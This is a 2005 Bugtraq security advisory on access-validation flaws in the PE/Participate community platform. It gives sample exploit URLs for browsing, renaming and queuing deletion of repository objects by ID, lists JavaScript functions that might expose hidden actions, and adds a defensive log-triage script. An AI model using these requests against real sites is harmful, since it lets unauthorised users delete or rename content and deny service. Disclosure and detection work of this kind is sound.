Message-ID: <20050308073011.16112.qmail@www.securityfocus.com>
Date: 8 Mar 2005 07:30:11 -0000
From: Altrus Wollesen <root@...our.ca>
To: bugtraq@...urityfocus.com
Subject: PE Multiple Remote Access Validation Vulnerabilities (Participate
    Systems Inc. / Outstart Inc.)




--------------------------------------------------------
- Multiple Remote Access Validation Vulnerabilities
- With PE (community software)
--------------------------------------------------------
(Altrus::security.honour.ca)

Program name: PE
  
Versions affected: <unknown>


Vendor(s):	Outstart Inc.
		Participate Systems Inc.

Vendor Notification Date: 23 FEB 2005

Risk: Moderately Serious
Impact: Denial of Service, File Upload


Vendor Homepages:  http://www.outstart.com
	   	   http://www.participate.com

---------------------------------------------------------
- Description
---------------------------------------------------------

PE is a proprietary Java-based community that mimics the 
functionality provided by existing open-source software. 
It facilitates community forums, document libraries, 
message boards, user interaction and a user management 
infrastructure.


From vendor site:

Available as either a hosted or installed solution, 
OutStart Participate is improving the collaboration and 
knowledge-sharing capabilities of many world-class 
companies, including GE Healthcare, Caremark, palmOne, 
Logitech, McGraw-Hill and Tivo. OutStart Participate 
combines three different systems into one powerful 
knowledge-sharing platform.


---------------------------------------------------------
- Discussion
---------------------------------------------------------

The software is affected by an Access Validation Error 
that could allow a malicious user to rename or delete 
critical directory objects. This could result in a denial 
of service of all library, forum, and/or specialized 
content until the directory objects were restored or 
renamed appropriately.


The Vendor has been notified of this issue, and has 
developed a patch. Sites and persons using the software 
are advised to install the patch - available from the 
vendor.

---------------------------------------------------------
- Sample Exploit Code
---------------------------------------------------------

http://www.targetsite.com/pe/repository/displaynavigator.jsp?rootFolder=101
	-Allows an attacker to browse a limited directory tree (in this case, the action directory). Changing to "rootFolder=105" allows for the document library to be browsed.
		
http://www.targetsite.com/pe/repository/include/renamepopup.jsp?selectedObject=101
	-Allows an attacker to rename the selected object ID (in this case, the action directory).

http://www.targetsite.com/pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101
	-Sets the object CSV for the delete navigator.

The following JavaScript commands might also be used to 
call functions otherwise unavailable to the user:

showDeleteView()
showWebFolderView()
showLibraryView()
showMyLibraryView()
singleSelectObject(objid)
processRadioSelection(radio, objid)
processCheckboxSelection(chkbox, objid)
singleSelectObject(objid)
addToSelectedObjects(objid)
removeFromSelectedObjects(objid)

---------------------------------------------------------
- Solutions
---------------------------------------------------------

The vendor has provided a patch. Its effectiveness is 
not confirmed, nor is its distribution.

---------------------------------------------------------
- References
---------------------------------------------------------

Authoritative and updated copies of this vulnerability can 
be found at:

http://security.honour.ca

---------------------------------------------------------
- Credits
---------------------------------------------------------

Discovered by: Altrus [root@...our.ca]
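
---------------------------------------------------------
- Added example: log triage for the affected endpoints
---------------------------------------------------------

The following is an added example, not part of the original advisory and not vendor code. It scans web server access logs for the three repository JSPs named above and lists, per client, which object IDs were browsed, renamed or queued for deletion, so an operator can compare them with what each user was entitled to touch. Assumptions: Common/Combined Log Format, a 2xx status meaning the page was served, a review threshold of two root folders, and constructed sample lines.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Endpoint -> (object-ID parameter, action), taken from the URLs in the advisory.
WATCHED = {
    "/pe/repository/displaynavigator.jsp": ("rootFolder", "browse"),
    "/pe/repository/include/renamepopup.jsp": ("selectedObject", "rename"),
    "/pe/repository/displaydeletenavigator.jsp": ("selectedObjectsCSV", "delete"),
}
# Assumption: the server writes Common/Combined Log Format.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def triage(lines, browse_limit=2):
    """Return {client: {"browse": ids, "rename": ids, "delete": ids, "flag": bool}}."""
    seen = defaultdict(lambda: {"browse": set(), "rename": set(), "delete": set()})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line we understand
        client, target, status = m.groups()
        url = urlsplit(target)
        # Lower-case the path so case variants on case-insensitive hosts still match.
        rule = WATCHED.get(url.path.lower())
        if rule is None or not status.startswith("2"):
            continue  # assumption: only 2xx responses mean the page was served
        param, action = rule
        for value in parse_qs(url.query).get(param, []):
            # selectedObjectsCSV may carry several IDs in one request.
            seen[client][action].update(v for v in value.split(",") if v.strip())
    report = {}
    for client, acts in seen.items():
        # Any rename/delete, or walking more root folders than the limit, needs review.
        flag = bool(acts["rename"] or acts["delete"]) or len(acts["browse"]) > browse_limit
        report[client] = {**{k: sorted(v) for k, v in acts.items()}, "flag": flag}
    return report

SAMPLE_LOG = [  # constructed sample lines, not taken from a real server
    '198.51.100.7 - - [08/Mar/2005:07:01:02 +0000] "GET /pe/repository/displaynavigator.jsp?rootFolder=101 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [08/Mar/2005:07:01:09 +0000] "GET /pe/repository/include/renamepopup.jsp?selectedObject=101 HTTP/1.1" 200 900',
    '198.51.100.7 - - [08/Mar/2005:07:01:15 +0000] "GET /pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101,105 HTTP/1.1" 200 900',
    '192.0.2.33 - - [08/Mar/2005:07:02:00 +0000] "GET /pe/repository/displaynavigator.jsp?rootFolder=105 HTTP/1.1" 200 5120',
    '192.0.2.33 - - [08/Mar/2005:07:02:05 +0000] "GET /pe/index.jsp HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for client, row in triage(SAMPLE_LOG).items():
        print(client, row)
```

Flagged clients are candidates for review, not confirmed abuse: the log shows that a rename or delete view was served for an object ID, not whether the user was authorised for it.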

